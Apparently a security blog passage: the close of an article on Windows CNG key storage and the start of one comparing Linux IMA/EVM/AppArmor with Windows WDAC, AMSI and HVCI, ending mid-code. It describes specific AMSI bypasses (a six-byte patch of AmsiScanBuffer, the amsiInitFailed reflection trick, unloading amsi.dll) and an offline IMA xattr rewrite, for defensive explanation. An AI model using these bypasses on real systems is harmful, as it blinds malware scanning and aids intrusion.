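// Encode the decision tree: first ask whether the key must persist,
// then pick a key home from the threat model.
function chooseKeyHome({ persistent, threatModel }) {
  if (!persistent) return "BCrypt (ephemeral key)";
  switch (threatModel) {
    case "machine-identity":    // hardware-rooted device identity
      return "Microsoft Platform Crypto Provider";
    case "user-pki":            // user-bound PKI on removable hardware
      return "Microsoft Smart Card Key Storage Provider";
    case "high-rate-regulated": // high signing rate, regulated custody
      return "third-party HSM KSP";
    default:                    // portable, fast, no special requirement
      return "Microsoft Software Key Storage Provider";
  }
}

console.log(chooseKeyHome({ persistent: false }));
console.log(chooseKeyHome({ persistent: true, threatModel: "machine-identity" }));
console.log(chooseKeyHome({ persistent: true, threatModel: "default" }));
```

Writing the choice down as code has one practical benefit: the provider name becomes an explicit value you can log and assert on, rather than whatever the default happens to be.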

For algorithm choice in mid-2026, the defensible defaults look like this. Symmetric encryption: ChaCha20-Poly1305 or AES-256-GCM. Hashing: SHA-256 or SHA-3 family. Signatures: ECDSA P-256 or P-384 today, with ML-DSA-65 in the back pocket for the inevitable hybrid transition. Key encapsulation: X25519 today, with X25519+ML-KEM-768 hybrid as soon as your peers support it. RSA-2048 only for legacy interoperability. RC4, 3DES, and SHA-1 only behind explicit deprecation policy, and only for verification of historical artifacts.

Key idea: The hardest thing about CNG is not learning the API. It is choosing the right KSP. That single decision -- where the private key actually lives -- determines almost everything about your threat model, your throughput, your compliance posture, and your operational complexity.

A few engineering rules survive in any setting.

Do not put persistent keys in BCrypt. Every BCrypt key handle dies with the process. The architectural separation exists for a reason. If the key needs to survive a reboot, it belongs in NCrypt under a named KSP.

Do not assume the Software KSP. Code that calls NCryptOpenStorageProvider(NULL) ends up with whatever the default is. On a server with an HSM KSP configured as the default, this might be what you want; on a developer workstation, it might be the Microsoft Software KSP. Be explicit. Pass the name string. Test the negative case where the KSP you named is not registered.

Audit which KSP your certificates actually use. A certificate enrolled with the Platform Crypto Provider behaves identically to a certificate enrolled with the Software KSP from certutil's point of view. The difference is invisible until you ask. Use certutil -store -v My to dump certificate properties, and look for the provider field.

Treat FIPS mode as a deployment fact, not a development toggle. Code that works fine on a developer workstation can break in surprising ways on a FIPS-enabled production server. Run your CI on a FIPS-toggled image periodically. Catch the STATUS_NOT_SUPPORTED returns before customers do.

Watch the PQC roadmap. The ML-KEM and ML-DSA primitives are in 24H2. Hybrid TLS in Schannel is not on by default at the OS level as of mid-2026 (the most recent Microsoft public posture in the cipher-suite documentation does not yet list a default-on hybrid group), but downstream protocol updates will come. Code that uses the BCrypt and NCrypt patterns shown here picks up the new algorithms with a string change.

Note: The single most useful CNG diagnostic command on a modern Windows system is certutil -csptest, which enumerates registered providers and the algorithms each one claims to support. Run it before you suspect a configuration drift, not after.

The story of CNG is the story of two architectural bets that paid off. The first bet was that algorithms would keep arriving, so the API should be a registry of strings rather than a hard-coded set of functions. The second bet was that key storage was a separate concern from algorithm implementation, so the same primitives could run against software, TPM, smart cards, and HSMs without changing the application. In 2007 those bets looked over-engineered. In 2026, with ML-KEM shipping behind the same BCryptOpenAlgorithmProvider call that an ECDH consumer would have used, they look like exactly the right design.

Frequently asked questions

No. Microsoft's BCrypt is the `bcrypt.h` primitives header in CNG, providing AES, SHA, HMAC, RNG, and related primitives. The Provos-Mazieres bcrypt is a password-hashing function based on the Blowfish cipher, with no connection to Windows. The naming collision is unfortunate but firmly entrenched. When in doubt, BCrypt with a capital "B" usually means Microsoft's CNG header; lowercase bcrypt usually means the password-hashing function.

On Windows, yes. .NET's `System.Security.Cryptography` namespace wraps CNG directly: `RSACng`, `ECDsaCng`, `AesGcm`, `SHA256.HashData()`, `CngKey`. Go, Rust, and Python bindings exist as third-party crates and packages (the Rust `windows` crate exposes both BCrypt and NCrypt, for example). OpenSSL on Windows does not transparently use CNG; you need the `openssl-cng` provider or direct CNG calls if you want the OS-validated primitives to do the work.

Both can do RSA, ECDSA, and (in 24H2) ML-DSA signatures. The difference is lifetime. BCrypt key handles are ephemeral: they live in your process and disappear when it exits. NCrypt keys are persisted in a KSP and survive process exit, reboots, and (for AD-replicated descriptors via DPAPI-NG) the loss of a single machine. Use BCrypt for one-shot ephemeral operations (signing a single message, deriving a session key); use NCrypt for anything with a certificate attached or anything that has to be around tomorrow.

Possibly, depending on what algorithms it calls. Setting `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\FIPSAlgorithmPolicy\Enabled = 1` causes CNG to refuse RC4, MD5, SHA-1 for new signatures, and a handful of other non-approved algorithms. Anything that relied on those returns `STATUS_NOT_SUPPORTED`. The fix is to switch to approved algorithms (AES, SHA-2 family, RSA, ECDSA, ML-KEM, ML-DSA), not to disable the toggle. The toggle is also necessary but not sufficient for FIPS compliance: you also need a Windows build with an active CMVP certificate covering the cryptographic modules.

As of mid-2026, the public Schannel documentation does not list a default-on hybrid group like `X25519MLKEM768`. The ML-KEM primitive is in CNG in 24H2, and Schannel can use it through the standard cipher-suite negotiation, but Microsoft has not publicly committed to enabling a hybrid group out of the box at the OS level. Chrome, Cloudflare, and AWS have already shipped hybrid PQ TLS in production at the application layer. Expect Schannel to follow once IETF standardization stabilizes and CMVP validation of the new modules catches up.

For a certificate in the user or machine store, run `certutil -store -v My` (or `My` replaced with the store name) and look at the "Provider" field of each certificate. `Microsoft Software Key Storage Provider` means the key is on disk under `%APPDATA%` or `%ALLUSERSPROFILE%`. `Microsoft Platform Crypto Provider` means the key lives inside the TPM (or Pluton). `Microsoft Smart Card Key Storage Provider` means the key is on a card. Third-party HSM KSPs will show the vendor's provider name. For a freshly-created key via `NCryptCreatePersistedKey`, the provider name you passed to `NCryptOpenStorageProvider` is the source of truth.

Because private keys do not live in the calling process. For the Microsoft Software KSP, key material lives in the LSA key-isolation process (`lsaiso.exe` under VBS, `lsass.exe` otherwise), and every operation that touches private bits has to cross that process boundary. The cost is around 30 to 100 microseconds per call. That is acceptable for signing or key derivation (operations that happen a handful of times per session); it would be punishing for bulk symmetric encryption. The architectural answer is to keep bulk crypto in BCrypt and let only the persistent-key operations pay the LRPC cost.

<StudyGuide slug="cng-architecture-bcrypt-ncrypt-ksps-and-windows-crypto" keyTerms={[ { term: "CAPI (Cryptographic Application Programming Interface)", definition: "The original Windows cryptographic API (1998-onward). Plug-in unit was the CSP. Superseded by CNG starting in 2007 but still present for backwards compatibility." }, { term: "CNG (Cryptography API: Next Generation)", definition: "The Windows cryptographic API since Vista (2007). Two-tier split: BCrypt for primitives, NCrypt for key storage. The basis for all modern Windows cryptography." }, { term: "CSP (Cryptographic Service Provider)", definition: "The CAPI-era plug-in unit. Monolithic DLL bundling algorithms, key storage, and FIPS posture." }, { term: "KSP (Key Storage Provider)", definition: "The CNG-era plug-in unit for persistent key storage. Microsoft ships four; third parties ship many more. Selected by name string passed to NCryptOpenStorageProvider." }, { term: "Microsoft Software Key Storage Provider", definition: "The default KSP. Stores DPAPI-wrapped keys on disk and dispatches operations through the LSA key-isolation process via LRPC." }, { term: "Microsoft Platform Crypto Provider", definition: "The TPM-and-Pluton-backed KSP. Keys are generated and used inside the TPM chip; private bits never leave the silicon." }, { term: "TPM key attestation", definition: "A three-key chain (EK -> AIK -> application key) that lets a CA verify a key was generated inside a real TPM. Supported by Active Directory Certificate Services since Windows Server 2012 R2." }, { term: "FIPS 140", definition: "US federal certification program for cryptographic modules. Validated modules receive a public CMVP certificate. Windows 11's bcryptprimitives.dll holds CMVP certificate #4825, cng.sys holds #4766." }, { term: "ML-KEM (FIPS 203)", definition: "Module-Lattice Key Encapsulation Mechanism. The NIST-standardized post-quantum KEM, formerly known as CRYSTALS-Kyber. Shipped in Windows 11 24H2." 
}, { term: "ML-DSA (FIPS 204)", definition: "Module-Lattice Digital Signature Algorithm. The NIST-standardized post-quantum signature scheme, formerly known as CRYSTALS-Dilithium. Shipped in Windows 11 24H2." }, { term: "DPAPI-NG", definition: "The CNG-era rebuild of the original Data Protection API. Uses NCrypt protection descriptors to bind protected data to AD principals (users, groups, web credentials) rather than to a single machine." }, { term: "SymCrypt", definition: "Microsoft's open-source cryptographic implementation library. The actual workhorse behind BCrypt and NCrypt since Windows 10 version 1703 (2017)." } ]} />

Two Routes to Code Integrity: Linux IMA + AppArmor vs Windows WDAC + AMSI

noreply@paragmali.com (Parag Mali) — Sat, 16 May 2026 00:00:00 GMT

Linux and Windows have spent fifteen years answering the same question -- "is this code allowed to run?" -- and arrived at radically different architectures. Linux composes half a dozen narrow kernel modules (IMA, EVM, AppArmor, SELinux, fs-verity, IPE) plus a userspace daemon (`fapolicyd`); Windows ships one integrated suite (App Control + HVCI + AMSI + Smart App Control). Both stacks shipped their v1 with the **check in the wrong place**, and the architectural pivots that fixed it -- EVM's HMAC-sealed xattrs, HVCI's hypervisor-isolated verifier, IPE's property-based decisions -- are the breakthrough lesson of this comparison. Crypto is solved. Trust-boundary protection and policy expressiveness are not, and Rice's theorem says they never fully will be.

1. Two bypasses, same architectural shape

On a Windows 11 desktop, an attacker with a PowerShell session under their control can blind Microsoft Defender to every script that session ever evaluates by overwriting six bytes inside one function in amsi.dll. The Antimalware Scan Interface, the in-process bridge between scripting hosts and the registered antivirus product, dutifully reports "clean" on every subsequent buffer because the prologue of AmsiScanBuffer has been patched to mov eax, 0; ret (B8 00 00 00 00 C3).

The interface ships exactly as Microsoft documents it, and the function still has the signature in MSDN [@learn-microsoft-com-amsi-amsiscanbuffer]: the attacker did not need to break anything. They needed only to write into the address space they already owned.

On a Linux server, a different attacker with offline access to the disk -- recovered from a stolen laptop, a forensics image, a hostile cloud-provider snapshot -- mounts the filesystem and rewrites a system binary together with the file's security.ima extended attribute. When the box boots, the kernel's Integrity Measurement Architecture hashes the binary at exec time, compares the hash to the value stored in security.ima, sees a match, and allows execution. Without the Extended Verification Module, IMA appraisal has no defence against this offline-rewrite attack [@lwn-net-articles-394170] -- the reference hash is sitting next to the file the attacker just replaced.

Both operating systems claim fail-closed code-integrity enforcement. Both lose to a single architectural mistake about where the check runs. The mistakes are different in detail and identical in shape: the verifier is reachable by the attacker. On Windows the attacker shares the script host's address space with the scanner. On Linux the attacker shares the on-disk container with the reference hash.

This article exists to make that symmetry visible. The two stacks reached their 2026 form by very different routes -- Linux composes six narrow Linux Security Modules and one userspace daemon, Windows ships one tightly-coupled product line -- but the breakthroughs on each side answered the same question: how do you move the verifier out of reach?

The Linux answer was EVM (HMAC the extended attributes that IMA depends on) and IPE (decide on immutable file properties rather than file contents). The Windows answer was HVCI (lift the kernel-mode code-integrity check into a hypervisor-isolated secure kernel). The names are different. The lesson is one.
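The difference between "hash next to the file" and "HMAC over that hash" fits in a short simulation. This is a simplified model, not the kernel's logic: real EVM covers several extended attributes plus inode metadata and takes its key from the kernel keyring, whereas the sketch HMACs only the IMA hash, and the key string and function names are hypothetical.

```javascript
const { createHash, createHmac } = require("node:crypto");

const sha256Hex = (data) => createHash("sha256").update(data).digest("hex");
const hmacHex = (key, data) => createHmac("sha256", key).update(data).digest("hex");

// Install a file with its reference hash (IMA) and an HMAC over that hash (EVM).
function install(content, evmKey) {
  const ima = sha256Hex(content);
  return { content, xattrs: { ima, evm: hmacHex(evmKey, ima) } };
}

// IMA alone: compare the content hash to the adjacent reference hash.
function imaOnlyAppraise(file) {
  return sha256Hex(file.content) === file.xattrs.ima;
}

// IMA plus EVM: also require a valid HMAC over the reference hash.
function imaPlusEvmAppraise(file, evmKey) {
  return imaOnlyAppraise(file) && hmacHex(evmKey, file.xattrs.ima) === file.xattrs.evm;
}

const kernelKey = "key-held-outside-the-disk-image"; // hypothetical
const file = install("original binary", kernelKey);

// Offline attacker: rewrites the content and the adjacent reference hash,
// but can only guess at the HMAC key.
file.content = "backdoored binary";
file.xattrs.ima = sha256Hex(file.content);
file.xattrs.evm = hmacHex("attacker-guess", file.xattrs.ima);

console.log(imaOnlyAppraise(file));               // true: the bypass
console.log(imaPlusEvmAppraise(file, kernelKey)); // false: the fix
```

The verifier's secret has moved somewhere the disk image does not reach, which is the same move HVCI makes with a different boundary.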

Why did Linux and Windows arrive at such different architectures in the first place? That story starts in an IBM research lab in 2003.

2. The question both operating systems are trying to answer

Both lineages exist to answer one question -- "is this code allowed to run?" -- but they put the check in completely different places. Before we can compare them honestly, we need a shared vocabulary for the three layers any production code-integrity stack must cover.

The first layer is code integrity itself, often abbreviated CI: a gate on the file's content or its signer. Did this .so come from a package my distribution signed? Does this .exe match an Authenticode chain rooted in a publisher my policy trusts? The answer is binary. The hook fires before the process loads the bytes.

The second layer is mandatory access control, or MAC. Now the process is running. What can it do? Can nginx open /etc/shadow? Can mshta.exe spawn cmd.exe? MAC is enforced by the kernel above discretionary access control and cannot be overridden by userspace privileges.

Mandatory access control (MAC): A kernel-enforced policy layer above traditional discretionary access control (DAC). Unlike DAC, where the file owner sets permissions, MAC policy is set by the system administrator and applied uniformly to all processes; no user, including root, can override it without changing the policy itself.

The third layer is content inspection: gating not on the file but on the buffer the interpreter is about to evaluate. The PowerShell engine has just deobfuscated a long string into a script block. Is the script block malicious? Linux has no production equivalent. Windows ships AMSI [@learn-microsoft-com-interface-portal] for exactly this.

Where each operating system puts these checks tells you almost everything about its architectural philosophy.

Linux puts every check on a Linux Security Module hook [@kernel-org-security-lsmhtml]. IMA registers at bprm_check (the kernel hook that fires when a binary is about to be executed), file_mmap with MAY_EXEC, module_check, firmware_check, and kexec_*. AppArmor and SELinux register at the syscall-level access hooks. fapolicyd rides on top of fanotify. IPE hooks op=EXECUTE. The kernel is the trust boundary, and every mechanism is a polite tenant inside it.

Linux Security Modules (LSM): The kernel framework, merged into Linux 2.6.0 in December 2003, that hosts pluggable security modules at well-defined hook points in the kernel. LSMs include SELinux, AppArmor, Smack, Tomoyo, IMA, EVM, IPE, BPF LSM, and Landlock; multiple modules can coexist via "LSM stacking".

Windows takes the opposite path. The PE loader is the gate for user-mode code integrity (UMCI). The kernel-mode code-integrity check is, in the modern stack, moved out of the normal kernel into a small secure kernel running on top of Hyper-V -- Hypervisor-protected Code Integrity, HVCI [@learn-microsoft-com-code-integrity]. The script broker runs in-process with each scripting host. Cloud reputation is consulted via the Intelligent Security Graph and exposed to consumers as Smart App Control.

Platform Configuration Register (PCR): A monotonically extendable hash register inside a Trusted Platform Module. New measurements are folded in with `PCR_new = SHA256(PCR_old || measurement)`. Once extended, the value cannot be rolled back without resetting the TPM. IMA extends file-content hashes into PCR 10; the Windows Measured Boot chain uses PCRs 0-7 and 11-14.

The architectural philosophy comes down to a sentence each. Linux trusts the kernel surface and packs every integrity mechanism into it as a separate LSM. Windows trusts a hypervisor-isolated secure kernel and uses it to host the integrity logic the normal kernel cannot be trusted to run honestly.

flowchart LR
  subgraph CI[Code integrity: gate on file content or signer]
    direction TB
    L_IMA[Linux: IMA + EVM]
    L_IPE[Linux: IPE]
    L_FSV[Linux: fs-verity]
    L_FAP[Linux: fapolicyd]
    W_WDAC[Windows: App Control / WDAC]
    W_HVCI[Windows: HVCI / Memory Integrity]
    W_SAC[Windows: Smart App Control]
  end
  subgraph MAC[Mandatory access control: gate on running process behaviour]
    direction TB
    L_AA[Linux: AppArmor]
    L_SE[Linux: SELinux]
    W_NONE[Windows: no direct analogue, closest is AppContainer / ASR]
  end
  subgraph CS[Content inspection: gate on the buffer the interpreter will evaluate]
    direction TB
    W_AMSI[Windows: AMSI]
    L_GAP[Linux: no production equivalent]
  end
  CI --> MAC --> CS

Neither stack started this way. The 2026 stack on each side is the accumulated answer to fifteen years of failures. Here is how they grew up.

3. Two genesis stories

In 2003, four IBM researchers at the T. J. Watson Research Center -- Reiner Sailer, Xiaolan Zhang, Trent Jaeger, and Leendert van Doorn -- tried to convince the USENIX Security community that you could prove the integrity of a Linux web server to a remote verifier. Their paper, Design and Implementation of a TCG-based Integrity Measurement Architecture [@usenix-org-tech-sailerhtml], shipped at the 13th USENIX Security Symposium in 2004. It proposed hashing every executable file at load time, extending each hash into a TPM platform configuration register, and sending the resulting measurement list to a remote verifier who could compare it to a known-good manifest.

The performance evaluation [@usenix-org-sailerhtml-node19html] measured the cost on an IBM Netvista with a 2.4 GHz Pentium 4: the file_mmap LSM hook added 0.08 microseconds per call on a cache hit, and SHA-1 fingerprinting ran at roughly 80 MB/s. The headline claim was that more than 99.9% of measure calls landed on the cached path, so the overhead was essentially free.

Pentium 4-era SHA-1 at 80 MB/s vs Ice Lake-era SHA-NI-accelerated SHA-256 at roughly 2 GB/s per core: a 25x throughput jump in twenty years. The original paper's qualitative finding -- cache hit dominates, overhead is negligible -- holds even more strongly on modern silicon.

It took five years for that proposal to reach the kernel. IMA's measurement-only mode was merged in Linux 2.6.30 in June 2009. It hashed files at bprm_check, file_mmap, and module_check, extended TPM PCR 10, and otherwise let everything run.

The "is this hash allowed?" question would have to wait three more years. The Extended Verification Module landed in Linux 3.2 in January 2012; digital-signature mode for EVM followed in 3.3 in March 2012; and IMA-appraise, the enforcement extension that finally let the kernel return -EPERM when a file's hash did not match security.ima, merged in Linux 3.7 in December 2012 [@lwn-net-articles-488906]. The same LWN article frames the cadence plainly: "Much of IMA was added to the kernel in 2.6.30, but another piece, the extended verification module (EVM) was not merged until 3.2 ... Digital signature support was added to EVM in 3.3, and IMA appraisal is currently under review." Mimi Zohar's appraisal patchset [@lwn-net-articles-487700] is the canonical lore.kernel.org artifact of that final step.

AppArmor took a different, longer road. It was born inside Immunix in 1998 under the name "SubDomain", a path-based confinement layer designed to stop privilege-escalation exploits from doing anything the binary's profile did not name. Novell acquired Immunix in 2005, renamed SubDomain to AppArmor, and shipped it as the default mandatory access control layer on SLES and openSUSE. According to the Ubuntu AppArmor wiki [@wiki-ubuntu-com-apparmor], "AppArmor support was first introduced in Ubuntu 7.04, and is turned on by default in Ubuntu 7.10 and later" -- so by October 2007 AppArmor was already a default-on production MAC on the most-deployed Linux desktop distribution.

Mainlining did not happen until October 2010, when AppArmor finally landed in Linux 2.6.36 [@docs-kernel-org-lsm-apparmorhtml]. Seven years out of tree, three years default-on in Ubuntu, before the kernel community accepted it.

The contrast with SELinux [@en-wikipedia-org-security-enhancedlinux] is sharp. SELinux merged into Linux 2.6.0 in December 2003 -- barely a year after the LSM framework was created. SELinux was, in fact, the reason the LSM framework existed.

SELinux's type-enforcement model maps directly to LSM's "label the subject, label the object, look up the rule" hook signature. AppArmor's path-based reasoning does not. LSM hooks see inodes, not paths -- and an inode can be reached from many paths (bind mounts, hard links, namespace games, chroots). To merge, AppArmor had to push kernel-side helpers like `vfs_path_lookup` and `d_absolute_path` upstream so it could reconstruct the absolute path of the object at hook time. The conceptual fight took three rejected merge attempts and seven years. The lesson is one Linux kernel reviewers have repeated since: a security model is not just an algorithm, it is a commitment to a particular kind of name-resolution semantics.

The Windows lineage starts in a different building entirely. AppLocker shipped with Windows 7 and Windows Server 2008 R2 in 2009: a user-mode-only allowlist, with no hypervisor or kernel-mode backing, and rules tied to file paths, publishers, or hashes. AppLocker is still supported on modern Windows but "isn't getting new feature improvements" [@learn-microsoft-com-applocker-overview]; the modern successor is App Control for Business.

Windows 10 RTM (version 1507, July 2015) shipped the first version of Device Guard along with AMSI [@learn-microsoft-com-interface-portal] and PowerShell 5.0, which integrated with AMSI from day one. Device Guard became known as Windows Defender Application Control (WDAC) and then, in 2024, was renamed once more to App Control for Business. User-mode code integrity (UMCI) became a policy option, FilePath rules were added in Windows 10 version 1903 [@learn-microsoft-com-applocker-overview], multiple-policy authoring landed in the same release, and Smart App Control made its consumer debut in Windows 11 22H2 in September 2022 [@blogs-windows-com-2022-update].

gantt
  title Linux and Windows code-integrity timeline
  dateFormat YYYY-MM
  axisFormat %Y
  section Linux
  SELinux mainline 2.6.0 :2003-12, 12M
  AppArmor at Immunix :1998-01, 84M
  AppArmor default in Ubuntu :2007-10, 36M
  IMA mainline 2.6.30 :2009-06, 32M
  EVM mainline 3.2 :2012-01, 2M
  EVM digital sigs 3.3 :2012-03, 9M
  IMA-appraise 3.7 :2012-12, 24M
  AppArmor mainline 2.6.36 :2010-10, 14M
  fs-verity 5.4 :2019-11, 60M
  IPE 6.12 :2024-11, 12M
  section Windows
  AppLocker (Win 7) :2009-10, 70M
  Device Guard + AMSI + PowerShell 5 (1507) :2015-07, 25M
  WDAC UMCI (1709) :2017-10, 18M
  FilePath rules + multi-policy (1903) :2019-05, 24M
  HVCI broadens (Win 10 1607+) :2016-08, 60M
  Smart App Control (Win 11 22H2) :2022-09, 24M
  App Control for Business rename :2024-01, 12M

Two timelines, two design philosophies, both shipping their v1 with the same kind of mistake. The next section makes that concrete.

4. Where the naive approach breaks

Both stacks shipped their first version with the check in the wrong place. Two stories make this concrete; two more refine it.

Story A: IMA-as-shipped (2009) without EVM

When IMA reached the kernel in Linux 2.6.30, it hashed the file at bprm_check and stored the reference hash in the file's security.ima extended attribute. That xattr is the only thing an attacker with offline disk access has to rewrite to defeat the check. Mount the filesystem from another box, swap the binary for a malicious one, recompute the hash over the new binary, and write the new value into security.ima. Boot the box. The kernel hashes the malicious binary at exec, reads the matching xattr the attacker just wrote, and lets the syscall through.

This is the offline-tampering attacker model EVM was designed to defeat. The contemporaneous LWN coverage put it plainly: "IMA can be subverted by 'offline' attacks, where file data or metadata is changed out from under IMA. Mimi Zohar has proposed the extended verification module (EVM) patch set as a means to protect against these offline attacks." [@lwn-net-articles-394170]

The EVM v5 patchset [@lwn-net-articles-443038], posted by Zohar in May 2011, describes the design directly: "Extended Verification Module (EVM) detects offline tampering of the security extended attributes (e.g. security.selinux, security.SMACK64, security.ima) ... initial method maintains an HMAC-sha1 across a set of security extended attributes, storing the HMAC as the extended attribute 'security.evm'."

Story B: AMSI as shipped (2015) inside the script host

AMSI's design is documented in How AMSI helps you defend against malware [@learn-microsoft-com-amsi-helps]: "Script (malicious or otherwise), might go through several passes of de-obfuscation. But you ultimately need to supply the scripting engine with plain, un-obfuscated code. And that's the point at which you invoke the AMSI APIs."

A scripting host -- PowerShell, WSH, MSHTA, Office VBA, the UAC installer dialog -- calls AmsiInitialize, then for every plain-text script buffer it is about to execute calls AmsiScanBuffer [@learn-microsoft-com-amsi-amsiscanbuffer] or AmsiScanString. The call is routed through amsi.dll, loaded into the host process, which dispatches to the registered IAntimalwareProvider COM server. Defender is the default provider.

The detection logic is sound. The trust boundary is not. The attacker already controls the script host. Three single-shot bypass techniques have lived in red-team toolkits since 2016:

Patch AmsiScanBuffer's prologue in memory to mov eax, 0; ret (B8 00 00 00 00 C3). Six bytes of opcode rewrite, no syscalls required, blinds the scanner permanently for this process.
Set System.Management.Automation.AmsiUtils.amsiInitFailed = true via reflection. PowerShell checks the flag on every scan path and short-circuits.
Unload amsi.dll via FreeLibrary. There is no scanner left to call.

Microsoft tracks this so closely that its own "Applications that can bypass App Control" [@learn-microsoft-com-bypass-appcontrol] deny list calls out the AMSI-bypass-capable versions of system.management.automation.dll by hash. The defender's authoritative list of files-to-block treats specific signed Microsoft DLLs as named threats.

The same Microsoft bypass list also enumerates mshta.exe, wscript.exe, cscript.exe, msbuild.exe, Microsoft.Build.dll, windbg.exe, cdb.exe, kd.exe, dotnet.exe, csi.exe, rcsi.exe, addinprocess.exe, wmic.exe, bash.exe, wsl.exe, runscripthelper.exe, and dozens of others -- 40+ entries today, growing whenever a new Microsoft-signed binary turns out to host an attacker-friendly evaluator.

Note: The host process making the AMSI call is the same process the attacker is running in. Any defence-in-depth plan that treats AMSI as a hard control is mis-specified. Treat AMSI as a high-quality telemetry surface feeding Defender for Endpoint and EDR pipelines; budget for the bypass.

// In Windows, AMSI scans each plain-text script buffer just before
// the scripting engine evaluates it. The scanner lives in amsi.dll,
// loaded into the script host process. The attacker who controls
// that process can rewrite the function's first few bytes.
//
// This toy model shows the consequence: once "patched", the scanner
// returns CLEAN regardless of input, and the assertion below holds
// for every possible payload.

const AMSI_RESULT_CLEAN = 0;
const AMSI_RESULT_MALWARE = 32768;

function amsiScanBuffer(buf, patched) {
  if (patched) return AMSI_RESULT_CLEAN;
  if (buf.includes("Invoke-Mimikatz")) return AMSI_RESULT_MALWARE;
  return AMSI_RESULT_CLEAN;
}

console.log("Normal mode:");
console.log(" clean payload: ", amsiScanBuffer("Get-Process", false));
console.log(" malicious payload:", amsiScanBuffer("Invoke-Mimikatz", false));

console.log("\nAfter six-byte patch:");
console.log(" clean payload: ", amsiScanBuffer("Get-Process", true));
console.log(" malicious payload:", amsiScanBuffer("Invoke-Mimikatz", true));

// The takeaway: no input ever produces MALWARE once the scanner is patched.
// Strengthening AMSI's signature engine cannot fix this. The scanner
// must move out of the script host's address space.

Story C: WDAC's "trust all Microsoft-signed code" anti-pattern

A WDAC policy that trusts code signed by Microsoft also trusts every binary Microsoft has ever signed. That set includes mshta.exe, wscript.exe, cscript.exe, msbuild.exe, wmic.exe, system.management.automation.dll, and the 40-plus other binaries enumerated on Microsoft's own App Control bypass list [@learn-microsoft-com-bypass-appcontrol]. The LOLBAS community catalogue [@lolbas-project-github-io] widens the field to roughly 200 living-off-the-land binaries with explicit MITRE ATT&CK technique mappings.

The pattern is structural: WDAC grants trust at signer granularity (a chain rooted at "Microsoft Corporation"); attackers exploit at binary granularity (the specific mshta.exe that will happily evaluate an HTA blob containing a PowerShell stager). Any non-trivial WDAC policy must therefore contain explicit hash-level denies for the known-bad versions, and must keep growing those denies as Microsoft ships new signed binaries.
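The signer-versus-binary mismatch can be sketched as a toy policy evaluator. This is not the real CIPolicy format: the `policy` shape, the `evaluate` helper, and the hash strings are all hypothetical placeholders. The only behaviour it assumes is the one described above, that an explicit hash-level deny overrides a signer-level allow.

```javascript
// Toy model of signer-level allow plus hash-level deny.
// Not the real CIPolicy format; names and hashes are made up.
const policy = {
  allowedPublishers: new Set(["Microsoft Corporation"]),
  deniedHashes: new Set(["hash-of-mshta-v1"]), // hypothetical placeholder
};

function evaluate(policy, binary) {
  // Explicit denies are checked first so they override any allow.
  if (policy.deniedHashes.has(binary.hash)) return "BLOCK";
  if (policy.allowedPublishers.has(binary.publisher)) return "ALLOW";
  return "BLOCK"; // default deny for everything the policy does not name
}

const notepad = { name: "notepad.exe", publisher: "Microsoft Corporation", hash: "hash-of-notepad" };
const mshtaV1 = { name: "mshta.exe", publisher: "Microsoft Corporation", hash: "hash-of-mshta-v1" };
const mshtaV2 = { name: "mshta.exe", publisher: "Microsoft Corporation", hash: "hash-of-mshta-v2" };
const unsigned = { name: "tool.exe", publisher: null, hash: "hash-of-tool" };

for (const b of [notepad, mshtaV1, mshtaV2, unsigned]) {
  console.log(b.name, b.hash, evaluate(policy, b));
}
```

The second `mshta.exe` build is allowed because only its predecessor's hash is on the deny list, which is the maintenance burden the paragraph above describes: every newly signed build of a risky binary needs its own deny entry.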

Story D: fapolicyd's permissive-window failure

fapolicyd [@access-redhat-com-fapolicydsecurity-hardening] is the Red Hat userspace allowlister. It sits on the fanotify permission channel and answers "may this open or exec proceed?" against a compiled rule database. It does not have IMA's offline-tampering problem because trust is inherited from the RPM database: "An application is trusted when the system package manager correctly installs it and therefore registered in the system RPM database. The fapolicyd daemon uses the RPM database as a list of trusted binaries and scripts."

What it does have is an operational footgun. Setting permissive=1 "just for troubleshooting" silently disables enforcement. Terminating the daemon causes the kernel to fail open after the fanotify response timeout. The architectural choice -- userspace daemon over kernel-mode hook -- is what makes both failure modes possible.

Key idea: The check was strong. The boundary protecting the check was weak. On IMA-as-shipped the reference hash sat next to the file the attacker rewrote. On AMSI the scanner sat inside the process the attacker controlled. On WDAC the trust grant was wider than the exploitation unit. On fapolicyd the verifier was a userspace process that could be terminated. Four different stacks, four different boundary failures, one identical lesson.

Bypass class	Stack	Concrete example	Root cause
Offline metadata swap	IMA without EVM	Rewrite binary and matching `security.ima` xattr from rescue media	Reference value stored next to the file under attacker control
In-process scanner patch	AMSI in PowerShell	`mov eax, AMSI_RESULT_CLEAN; ret` over `AmsiScanBuffer` prologue	Scanner shares address space with the script host the attacker runs in
Signer-vs-binary mismatch	WDAC Publisher rules	Allow Microsoft-signed code, attacker runs `mshta.exe`	Trust grant is coarser than the exploitable unit
Daemon liveness	fapolicyd	Terminate `fapolicyd` or set `permissive=1`	Verifier is a userspace process with no kernel-rooted backstop

Each of these failures has the same shape: the check was strong, the boundary protecting the check was weak. Both operating systems noticed, and fixed it in 2012 and 2016 in very different ways. Both fixes followed the same principle.

5. The architectural pivots

Both lineages reached the same conclusion, four years apart: strengthen the boundary, not the check. Each pivot moved the trust boundary outward, beyond the place the attacker could reach.

EVM (Linux 3.2, January 2012): the xattrs become non-forgeable

The Extended Verification Module computes an HMAC over the security-relevant extended attributes -- security.ima, security.selinux, security.SMACK64, security.apparmor, security.capability -- plus inode metadata (UID, GID, mode, generation), and stores the result in security.evm. The HMAC key is loaded into the kernel keyring at boot, ideally sealed to a TPM 2.0 PCR set so the key is not retrievable except on a machine whose boot state matches the sealing measurement. The kernel keyring documentation for trusted and encrypted keys [@kernel-org-trusted-encryptedhtml] describes the substrate.

An offline attacker with disk access still cannot forge security.evm without the HMAC key. Digital-signature mode (EVM digital signatures, Linux 3.3) gives the same guarantee without any on-box key material. The check did not get cryptographically stronger: HMAC was not new in 2012. What changed was that the reference value the check consults moved from "an xattr next to the file" to "an xattr whose integrity is bound to a key the attacker does not have". Red Hat documents the modern setup in Enhancing security with the kernel integrity subsystem [@access-redhat-com-subsystemsecurity-hardening].
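A toy model makes the difference between IMA alone and IMA with EVM concrete. It is a sketch under stated assumptions, not the kernel's xattr layout or HMAC input format: the `label`, `evmHmac`, and `appraise` helpers are hypothetical, the inode fields are a simplified subset, and HMAC-SHA256 is used purely for illustration.

```javascript
// Toy model: not the kernel's real xattr layout or HMAC input format.
const { createHash, createHmac, randomBytes } = require("node:crypto");

const sha256 = (data) => createHash("sha256").update(data).digest("hex");

// HMAC over the protected xattr plus inode metadata, like security.evm.
function evmHmac(key, file) {
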